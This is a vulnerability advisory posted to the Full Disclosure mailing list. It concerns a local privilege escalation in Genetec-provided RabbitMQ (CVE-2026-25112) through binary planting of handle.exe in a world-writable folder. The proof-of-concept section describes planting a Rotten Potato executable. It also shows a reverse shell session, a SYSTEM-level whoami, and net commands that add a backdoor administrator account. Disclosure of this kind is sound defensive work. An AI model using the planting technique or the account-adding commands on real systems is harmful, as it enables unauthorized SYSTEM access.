Full Disclosure mailing list archives

SEC Consult Vulnerability Lab Security Advisory < 20260608-0 >
=======================================================================
              title: Privilege Escalation via Binary Planting
            product: Genetec-provided RabbitMQ in multiple Genetec products
 vulnerable version: Multiple products, see below.
      fixed version: Multiple products, see below.
         CVE number: CVE-2026-25112
             impact: High
           homepage:https://www.genetec.com/products/unified-security/security-center
              found: 2026-03-02
                 by: Johannes Kruchem (Office Vienna)
                     Christian Hager (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult, an Atos business
                     Europe | Asia

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Leading technology provider of business intelligence, unified physical
security, public safety, and operations. Genetec develops open-platform
software, hardware, and cloud-based services for the physical security
and public safety industry. Its flagship product, Security Center,
unifies IP-based video surveillance, access control, and automatic
license plate recognition (ALPR) into one platform. A global innovator
since 1997, Genetec is headquartered in Montreal, Canada, and serves
enterprise and government organizations via an integrated network of
resellers, integrators, and consultants in over 159 countries. Genetec
was founded on the principle of innovation and remains at the forefront
of emerging technologies that unify physical security systems."

Source:https://www.linkedin.com/company/genetec/


Business recommendation:
------------------------
The vendor provides a patch for multiple affected products which should
be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the product
conducted by security professionals to identify and resolve potential further
security issues.


Vulnerability overview/description:
-----------------------------------
1) Local Privilege Escalation via Binary Planting (CVE-2026-25112)
The installation of RabbitMQ using Genetec Security Center installer
creates a directory `C:\ProgramData\Genetec\RabbitMQ` writable for any
authenticated user. The `erl.exe` now frequently tries to execute the
not existing `handle.exe` from this directory as
`NT AUTHORITY\LOCAL SERVICE`. Placing a malicious `handle.exe` in
`C:\ProgramData\Genetec\RabbitMQ` almost immediately invokes the `handle.exe`.
Since the LOCAL SERVICE user has `SeImpersonatePrivilege`, rotten potato attacks
lead to privilege escalation to SYSTEM.


Proof of concept:
-----------------
1) Local Privilege Escalation via Binary Planting (CVE-2026-25112)
Exploiting the LPE requires that RabbitMQ is installed via the Genetec Security
Center installer.

The "erl.exe" is looking for the executable "handle.exe" within the path
C:\ProgramData\Genetec\RabbitMQ, which does not exist. As the executable
erl.exe is running in the context of NT AUTHORITY\LOCAL SERVICE, the executable
handle.exe would also be executed in the same context. The path
C:\ProgramData\Genetec\RabbitMQ is writable for all users, which allows inserting
malicious executables as handle.exe. Planting an executable exploiting
Rotten Potato as handle.exe into C:\ProgramData\Genetec\RabbitMQ leads to privilege
escalation due to the enabled SeImpersonatePrivilege leading to SYSTEM.

[ genetec_handle_exe.png ]
Figure 1: Process explorer showing handle.exe calls

[ genetec_reverse_shell_whoami_priv.png ]
Figure 2: Established reverse shell, showing privileges including SeImpersonatePrivilege


The following listing shows the successful exploitation:
------------------------------------
PS C:\Users\...\Client> .\client.exe
[+] Listening on 0.0.0.0:9999 ...
[+] Waiting for incoming reverse shell connection ...

[+] Connection from 127.0.0.1:54674
[+] Shell session active ÔÇô type commands (exit to quit)
----------------------------------------------------

Microsoft Windows [Version 10.0.26200.7840]
(c) Microsoft Corporation. All rights reserved.

C:\ProgramData\Genetec\RabbitMQ> SigmaPotato.exe

C:\ProgramData\Genetec\RabbitMQ> whoami
nt authority\system

C:\ProgramData\Genetec\RabbitMQ> net user privesc [redacted] /ADD
The command completed successfully.

C:\ProgramData\Genetec\RabbitMQ> net localgroup Administrators privesc /ADD
The command completed successfully.

C:\ProgramData\Genetec\RabbitMQ> net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
privesc
The command completed successfully.
------------------------------------


Vulnerable / tested versions:
-----------------------------
The following product has been tested by SEC Consult:
* Genetec Mission Control

The following products were affected as well according to the vendor:

* Genetec-provided RabbitMQ (< v3.13.7.19)
* Genetec Mission Control™ (< v3.4.1.0)
* Genetec Industrial IoT (IIoT) — 5.x line (< v5.5.118.0)
* Genetec Industrial IoT (IIoT) — 6.x line (< v6.0.196.0)
* Genetec Airport Operational Manager (AOM) (< v1.6)
* Genetec Restricted Security Area (RSA) Surveillance (< v5.2.1)
* Genetec Inter-System (IS) Gateway (< v1.2)
* Sipelia™ (< v2.11)

All other Genetec products are not affected.


Vendor contact timeline:
------------------------
2026-03-03: Contacting vendor through Genetec PSIRT (security () genetec com)
2026-03-03: Confirmed receipt by Genetec
2026-03-10: Vendor confirmed vulnerability. Responded already with assigned
            CVE-2026-25112.
2026-03-12: Thanking vendor for professional and quick response. Asking for the
            patch development timeline.
2026-03-12: Vendor responds that their SLO is 60 days for high-severity issues.
            RabbitMQ prior to 4.2.3 is affected, used by multiple Genetec producs.
            Vendor will also provide a workaround if immediate update is not possible.
2026-03-13: Confirming alignment of coordinated advisory disclosure, asking for a list
            of affected products.
2026-03-13: Comprehensive list will be shared when all details are finalized.
2026-03-25: Vendor informs us that they are still actively working on it.
2026-04-07: Vendor informs us that they are still actively working on it.
2026-04-21: Vendor informs us that they are still actively working on it.
2026-04-23: Asking whether affected products are already known. Vendor will
            provide additional information when patched versions are confirmed.
2026-05-22: Vendor provides detailed list of affected products and version
            numbers as well as hot fix information & workaround. The CVE
            will be published on 25th May.
2026-05-26: Informing vendor that we will publish in in June because of public
            holidays.
            Vendor provides published CVE URL as well as advisory.
2026-06-03: Informing vendor about planned SEC Consult advisory release for 8th June.
2026-06-08: Coordinated release of advisory.


Solution:
---------
The vendor provides updated versions for multiple products as well as a hotfix.

* For new deployments, Genetec-provided RabbitMQ 3.13.7.19 is available.
  New deployments can use the Genetec-provided RabbitMQ 3.13.7.19 standalone installer
  safely without needing to run the mitigation utility.

* For existing deployments, customers running an affected version should execute
  the mitigation utility (SecurityUtility_CVE-2026-25112_RabbitMQ.exe) available in GTAP
  as soon as possible.

Genetec provided the following software versions which mitigate the issue:

* Genetec-provided RabbitMQ (3.13.7.19 and later)
* Genetec Mission Control™ (3.4.1.0 and later)
* Genetec Industrial IoT (IIoT) — 5.x line (5.5.118.0 and later)
* Genetec Industrial IoT (IIoT) — 6.x line (6.0.196.0 and later)
* Genetec Airport Operational Manager (AOM) (1.6 and later)
* Genetec Restricted Security Area (RSA) (5.2.1 and later)
* Genetec Inter-System (IS) Gateway (1.2 and later)
* Sipelia™ (2.11 and later (RabbitMQ no longer used starting from v2.11)

A hotfix is available for all affected products:
SecurityUtility_CVE-2026-25112_RabbitMQ.exe

https://resources.genetec.com/security-advisories/vulnerability-affecting-rabbitmq-deployment-in-genetec-products


Workaround:
-----------
If customers cannot apply the mitigation utility in a timely fashion, they should
restrict access to the following folder to admin users: ProgramData\Genetec\RabbitMQ


Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Atos business
Europe | Asia

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Atos business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your applicationhttps://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local officeshttps://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com
Web:https://www.sec-consult.com
Blog:http://blog.sec-consult.com
X:https://x.com/sec_consult

EOF C. Hager, J. Kruchem / @2026

Attachment: smime.p7s
Description: S/MIME Cryptographic Signature

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread:

• SEC Consult SA-20260608-0 :: Privilege Escalation via Binary Planting in Genetec-provided RabbitMQ in multiple Genetec products SEC Consult Vulnerability Lab via Fulldisclosure (Jun 08)